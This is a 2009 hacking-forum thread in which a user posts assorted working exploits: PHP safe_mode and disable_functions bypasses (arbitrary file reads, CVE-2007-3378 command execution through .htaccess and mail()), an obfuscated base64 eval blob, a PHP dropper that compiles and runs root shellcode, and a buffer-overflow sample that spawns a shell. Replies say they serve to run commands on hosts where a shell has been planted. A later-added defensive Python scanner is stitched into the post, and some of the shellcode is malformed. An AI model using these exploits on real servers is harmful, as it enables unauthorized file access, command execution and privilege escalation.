We Are DevilzCrew
 
Assorted Exploits and Bypasses

mywisdom
Guest


Number of posts: 19
Join date: 24.05.09

Post subject: Assorted Exploits and Bypasses   Sat Jun 20, 2009 1:20 am

Bypass Safe mode

php 4.4.2-5.2.1 bypass (load file)
Code:

<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by Maksymilian Arciemowicz SecurityReason.Com
cxib [at] securityreason [dot] com and max [at] jestsuper [dot] pl
pozdro sp3x
*/


$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp



echo "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nSet variables \$tymczas, \$file or use for variable file POST, GET like
?file=/etc/passwd\n <B><CENTER><FONT
COLOR=\"RED\">SecurityReason.Com
Exploit</FONT></CENTER></B>");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B>--- Start File ".htmlspecialchars($file)."
-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\n<FONT COLOR=\"RED\"><B>File
".htmlspecialchars($file)." has been already loaded. SecurityReason Team
;]</B></FONT>");
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> doesn't exist or you don't have
access.</CENTER></FONT>");
}
?>

Shell command & disable_functions bypass (php 5.2.3):
Code:

<?php
# SecurityReason
# Coded by Maksymilian Arciemowicz
# (C) Copyright SecurityReason
#
# Advisory : http://securityreason.com/achievement_securityalert/45
# Original Exploit : http://securityreason.com/achievement_exploitalert/9
#
# SecurityAlert : 45
# CVE : CVE-2007-3378
# SecurityRisk : High
# Remote Exploit : No
# Local Exploit : Yes
# Affected Software : PHP 5.2.3 and prior
#
# This exploit bypasses safe_mode, open_basedir and disable_functions.
# First it creates a crafted .htaccess file; then every executed command is written to result.txt using the mail() function.
# Usage :
# ?cxib=dhr - Delete .htaccess and result.txt
# ?sh=[our_command] - Execute the command
#

#variables
$htaccess="./.htaccess";
#variables


if(@mail("", "", "")==FALSE){
   die("mail() function isn't active.");
}

if(!is_writable("./")){
   die("This directory isn't writable.");
}

if(isset($_GET['cxib']) AND $_GET['cxib']=="dhr"){
   @unlink("./.htaccess");
   @unlink("./result.txt");
}

$usun="";
if(file_exists("./result.txt") AND file_exists("./.htaccess")){
   $usun .= "<p><a href=\"http://".$_SERVER["HTTP_HOST"].
$_SERVER["SCRIPT_NAME"]."?cxib=dhr\">Delete .htaccess and result.txt</a>";
}


$htmlstart="<HTML>
<HEAD>
<TITLE>SecurityReason Exploit - PHP 5.2.3 and
prior</TITLE>
</HEAD>
<BODY>";

$formtxt="<center><h1>Security<b><font
color=RED>R</font>eason</b></h1><p>Exploit for PHP 5.2.3 and
prior</p><B><CENTER><FONT
COLOR=\"RED\">C</FONT>oded by <b>Maksymilian Arciemowicz</b>

".$usun."
<p>Form:<br>

<form action=\"http://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."\"
name=\"Form\" method=\"POST\">
sh# <input type=\"text\" name=\"sh\" size=\"50\" value=\"\">
<input type=\"submit\" name=\"sent\" value=\"Exec\">
</form>
</CENTER></B>";

$htmlend="</BODY>
</HTML>";

$path=dirname($_SERVER["SCRIPT_NAME"]);

if(empty($sh)){
if(empty($_GET['sh'])){
if(empty($_POST['sh'])){

echo $htmlstart.$formtxt;

if(file_exists("./result.txt")){
   echo "<center><iframe src=\"http://".$_SERVER["HTTP_HOST"].
$path."/result.txt\" height=300 width=1000></center>";
}

echo $htmlend;

exit();
} else {
$sh=$_POST['sh'];
}
} else {
$sh=$_GET['sh'];
}
}

if (!$handle = @fopen($htaccess, 'w')) {
    echo "Cannot create ".$htaccess."<B>check your rights to this directory.<P>";
    exit;
}

$syntax="php_value mail.force_extra_parameters '-t && ".$sh." > ".dirname(__FILE__)."/result.txt'";

if (fwrite($handle, $syntax) === FALSE) {
    echo "Cannot write to file (".$htaccess.")";
    exit;
}
fclose($handle);

if(!empty($_POST['sent'])){
   @mail("", "", "Yeah");
   sleep(2);
   header("Location: http://".$_SERVER["HTTP_HOST"].
$_SERVER["REQUEST_URI"]."?cxib=".date('s'));
   exit();
}

?>

php 5.2.9:
Code:

<? eval(gzinflate(base64_decode('
hVRNb5tAED0Hif8wXaECcQJu1BwaA1GU2E0lN7Zs
txfLQms8FijAInbt2Kny3zuA4zhW1F5gmI83b97O
ch1417rmnupaum0/xvw8w2yOJYglrPN5yZN8uhBq
lqPStVNX13QtWVqfMCvU1jLC793J1FwmKZoz2waj
svx33o6uYSoRDouGg/FHVYfuTtUIo1iA6Q1H3cAr
guH9EC6dC+cbSL7EMBMLhM8gCszDOZe4SEqYbwsu
pTcvg//PQojeUpQZ5DxDn1UmAx6pROQ+i5UqrlzX
dIxw3B397o6m7H4yGYb3RJHNnFhlqSwwSngaxbyU
1lva+Hb0YzgJH3Tt5meXzewDBBqA7H6PAEwGGapY
LHxWCKlY4CV5sVKgtgVxUbhR7JUXycFAJs9kX7YZ
rHm6ItP8gEOVahP0ezC5mmfJHo4yF1JtU3zeQ41j
8UQ1bqVAYNbC65qR4hpTv915PfAKPMRNIpW0alJX
zLZ17SR7JOH3HkqP4iNHA9Vq1VDGngD4gJsipVO0
mMvOmi2w6yRiYhmcmhvci8QqV9ZbmU3OVsv+Q60P
VmofnhqcVqqKnhyzPk6CKmnH/yjWqULNIB9FDiY6
edG1l4rzU0ytrCZyfm7DTgbHYc1MRhTTxNGqTMMk
T5TVeOtviUoUNGMUn8Htr1F/QPtDrzNoRKwfrusy
50Ci3dXoDR4mcDvoD0Y+G3XvWABetTy8RA6leJI+
+0o7E4mUrC8XbbY7X5Kmd9Mfd32/JoAbjKr29YEu
ErTMYCzKcus4DvSoJfxj22AhUOYKGpFBlLAVK3KS
K+ZrhALLLJGSbpV0zEPu4LmvVIm1W02yY1dzilIh
sSa128hr+k/9BQ==
'))); ?>




Root Exploit

kernel 2.6.17
Code:

    <?php
    /******************************
    ![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]!
    Script Name : *nix Kernel <=2.6.17 Sudo Root Exploit
    Author : Affix
    Website : http://iHack.co.uk
    Description :
    Once this script has been run via
    Command line type `sudo su` and
    you will log in as root without the
    root password
    [PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]!
    ******************************/

    $cCode = "#include <stdio.h>

    char shellcode[] =
    \"\x31\xc0\" /* xor %eax, %eax */
    \"\x50\" /* push %eax */
    \"\x68\x2f\x2f\x73\x68\" /* push $0x68732f2f */
    \"\x68\x2f\x62\x69\x6e\" /* push $0x6e69622f */
    \"\x89\xe3\" /* mov %esp,%ebx */
    \"\x50\" /* push %eax */
    \"\x53\" /* push %ebx */
    \"\x89\xe1\" /* mov %esp,%ecx */
    \"\x31\xd2\" /* xor %edx,%edx */
    \"\xb0\x0b\" /* mov $0xb,%al */
    \"\xcd\x80\"; /* int $0x80 */

    int main()
    {
    void (*fp) (void);
    fp = (void *)shellcode;
    fp();
    }";

    print "$ 0day Kernel 2.6.17 Local Root by krupt\n";
    print "$ PoC krupt <iamkrupt@gmail.com>\n";
    print "$ Exploit : Affix <affix@iHack.co.uk>\n";
    print "$...\n";
    print "$ Please wait Exploit is being Executed...";

    $fh = fopen("/tmp/sploit.c", 'w') or die("can't open file");
    fwrite($fh, $cCode);
    fclose($fh);

    system("cd /tmp");
    system("cc -o sploit sploit.c");
    system("chmod 777 sploit.c");

    print "$ You may now login as root with no password.";
    print "$ Execute 'sudo su' command ";
    print "$ Root Shell spawning ";

    system("./sploit");

    //![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]!
    ?>

Setuid Shellcode (trial version for kernel 2.4.x)

Code:


/*drunken sh33lc0de by mywisdom*/
#include <stdio.h>
#include <stdlib.h>
int main()
{
    /* Note: as posted, the "/0x.." sequences are forward-slash text, not \x byte
       escapes, so the array holds the literal ASCII characters. The string is split
       with C literal concatenation only to undo the line wrapping of the original. */
    char drunk[]=
        "/0x55/0x89/0xe5/0x83/0xec/0x28/0x83/0xec/0x08/0xff/0x75/0x08/0x8d/0x45/0xec/0x50/0xe8/0x2f/0xff/0xff/0xff/0x83/0xc4/0x10/"
        "0xc9/0xc3/0x8d/0x4c/0x24/0x04/0x83/0xe4/0xf0/0xff/0x71/0xfc/0x55/0x89/0xe5/0x51/0x81/0xec/0x94/0x00/0x00/0x00/0xc7/0x45/0xf8/0x00/0x00/0x00/0x00/0xeb/"
        "0x0e/0x8b/0x45/0xf8/0xc6/0x84/0x05/0x78/0xff/0xff/0xff/0x41/0xff/0x45/0xf8/0x83/0x7d/0xf8/0x7f/0x7e/0xec/0x83/0xec/0x0c/0x8d/0x85/0x78/0xff/0xff/0xff/"
        "0x50/0xe8/0xa6/0xff/0xff/0xff/0x83/0xc4/0x10/0x83/0xec/0x0c/0x6a/0x00/0xe8/0xcd/0xfe/0xff/0xff/0x83/0xc4/0x10/0x83/0xec/0x0c/0x68/0x28/0x85/0x04/0x08/"
        "0xe8/0x9d/0xfe/0xff/0xff/0x83/0xc4/0x10/0xb8/0x00/0x00/0x00/0x00/0x8b/0x4d/0xfc/0xc9/0x8d/0x61/0xfc/0xc3/0x90/0x90/0x90/0x90/0x90";
    (*(void (*)()) drunk)();
}




Sample BOF followed by setuid:
Code:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void overflow_function (char *str)
{
  char buffer[20];

  strcpy(buffer, str); // Copies str into buffer with no bounds check
}

int main()
{
  char big_string[128];
  int i;

  for(i=0; i < 128; i++) // Loop 128 times
  {
      big_string[i] = 'A'; // And fill big_string with 'A's
  }
  overflow_function(big_string);
  setuid( 0 );

  system( "/bin/bash" );
  return 0;
  // Unreachable: main has already returned above
  seteuid(0);
  execve("./setuid",0,0);
  return 0;
}


Last edited by mywisdom on Sat Jun 20, 2009 1:56 am, edited 1 time in total
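Added example, not part of the original post and not SecurityReason's or mywisdom's code: a defender-side scanner, written in Python, that walks a web root and flags the three patterns the post above relies on. It reports an `.htaccess` that overrides sensitive PHP ini keys such as `mail.force_extra_parameters` (the CVE-2007-3378 technique, where the posted script turns `mail()` into a command runner), PHP sources that read files through the `compress.zlib://` wrapper, and `eval(gzinflate(base64_decode(...)))` packed code like the "php 5.2.9" blob. The sample inputs are constructed; `COMMAND_PLACEHOLDER` and `BASE64_PLACEHOLDER` stand in for attacker-supplied content, and the list of sensitive ini keys is the editor's own choice, not something the thread states.

```python
import re
import sys
from pathlib import Path

# Ini keys that a per-directory .htaccess should not be changing. The list is the
# editor's own choice for this example, not something the thread states.
SENSITIVE_INI_KEYS = {
    "mail.force_extra_parameters",  # abused by the posted script: "-t && <cmd>" handed to sendmail
    "auto_prepend_file",
    "auto_append_file",
    "disable_functions",
    "safe_mode",
    "open_basedir",
    "allow_url_include",
    "allow_url_fopen",
}

# Matches php_value / php_flag / php_admin_value / php_admin_flag <key> <value>, one per line.
HTACCESS_DIRECTIVE = re.compile(
    r"^\s*php_(?:admin_)?(?:value|flag)\s+([A-Za-z0-9_.]+)\s+(.*)$",
    re.IGNORECASE | re.MULTILINE,
)

# Source-level patterns taken from the code posted in the thread.
SOURCE_PATTERNS = {
    "zlib_wrapper_read": re.compile(r"compress\.zlib://", re.IGNORECASE),
    "packed_eval": re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.IGNORECASE),
    "mail_force_extra_parameters": re.compile(r"mail\.force_extra_parameters", re.IGNORECASE),
}

PHP_EXTENSIONS = (".php", ".phtml", ".inc")


def scan_htaccess(text):
    """Return (key, value) pairs for directives that override a sensitive ini key."""
    hits = []
    for match in HTACCESS_DIRECTIVE.finditer(text):
        key = match.group(1).lower()
        if key in SENSITIVE_INI_KEYS:
            hits.append((key, match.group(2).strip()))
    return hits


def scan_php_source(text):
    """Return the names of the source patterns present in a PHP file, sorted."""
    return sorted(name for name, rx in SOURCE_PATTERNS.items() if rx.search(text))


def scan_files(files):
    """files: {relative_path: content}. Returns {relative_path: [finding, ...]} for files with hits."""
    findings = {}
    for rel, text in files.items():
        name = rel.rsplit("/", 1)[-1]
        if name == ".htaccess":
            hits = [f"htaccess_override:{k}={v}" for k, v in scan_htaccess(text)]
        elif name.lower().endswith(PHP_EXTENSIONS):
            hits = scan_php_source(text)
        else:
            continue
        if hits:
            findings[rel] = hits
    return findings


def scan_tree(root):
    """Read every regular file under root (dotfiles included) and hand the set to scan_files."""
    root = Path(root)
    files = {}
    for path in root.rglob("*"):
        if path.is_file():
            try:
                files[path.relative_to(root).as_posix()] = path.read_text(errors="replace")
            except OSError:
                continue
    return scan_files(files)


# Constructed samples. The first mirrors the directive the posted script writes;
# COMMAND_PLACEHOLDER stands in for the attacker-supplied command.
SAMPLE_HTACCESS = "php_value mail.force_extra_parameters '-t && COMMAND_PLACEHOLDER > /var/www/result.txt'\n"
SAMPLE_CLEAN_HTACCESS = "RewriteEngine On\nphp_value upload_max_filesize 8M\n"
SAMPLE_PHP = "<?php copy('compress.zlib://'.$_GET['file'], $tmp); ?>"
SAMPLE_PACKED_PHP = "<? eval(gzinflate(base64_decode('BASE64_PLACEHOLDER'))); ?>"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for rel, hits in sorted(scan_tree(sys.argv[1]).items()):
            print(rel, hits)
    else:
        print(scan_files({".htaccess": SAMPLE_HTACCESS, "index.php": SAMPLE_PHP}))
```

Run it as `python scanner.py /var/www` to get one line per file with findings. Any per-directory override of `mail.force_extra_parameters` deserves a look, because that key controls the extra arguments PHP passes to the sendmail binary on every `mail()` call; a stray `result.txt` next to such an `.htaccess` is the dropped command output the posted script reads back through an iframe.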
vhesckot
Guest

Number of posts: 56
Join date: 03.06.09

Post subject: Re: Assorted Exploits and Bypasses   Sat Jun 20, 2009 1:42 am

WOW, what is that, bro???
I don't get it, I'm a newbie after all....
But, nice share, bro....
gunslinger_
Lab Assistant


Number of posts: 184
Join date: 15.05.09
Age: 24
Location: mars

Post subject: Re: Assorted Exploits and Bypasses   Sat Jun 20, 2009 4:35 am

hoooooooreeeeeeeeeeeeeeeeee
got a collection of bypasses from om wisdom...
nice share, om...
N4ck0
Guest

Number of posts: 59
Join date: 21.06.09

Post subject: Re: Assorted Exploits and Bypasses   Sun Jun 21, 2009 9:21 am

First of all, my apologies to the masters here.
I just want to ask, what is a bypass actually used for?
mywisdom
Guest


Number of posts: 19
Join date: 24.05.09

Post subject: Re: Assorted Exploits and Bypasses   Sun Jun 21, 2009 11:08 am

For example, bro, if you plant a shell where safe mode is on, you can load files with this bypass, and you can run shell commands.
N4ck0
Guest

Number of posts: 59
Join date: 21.06.09

Post subject: Re: Assorted Exploits and Bypasses   Mon Jun 22, 2009 12:17 am

Oh, I see.
Okay.
That's new knowledge for me.

Thanks.
gunslinger_
Lab Assistant


Number of posts: 184
Join date: 15.05.09
Age: 24
Location: mars

Post subject: Re: Assorted Exploits and Bypasses   Mon Jun 22, 2009 8:11 am

Check the safe mode setting first before taking action......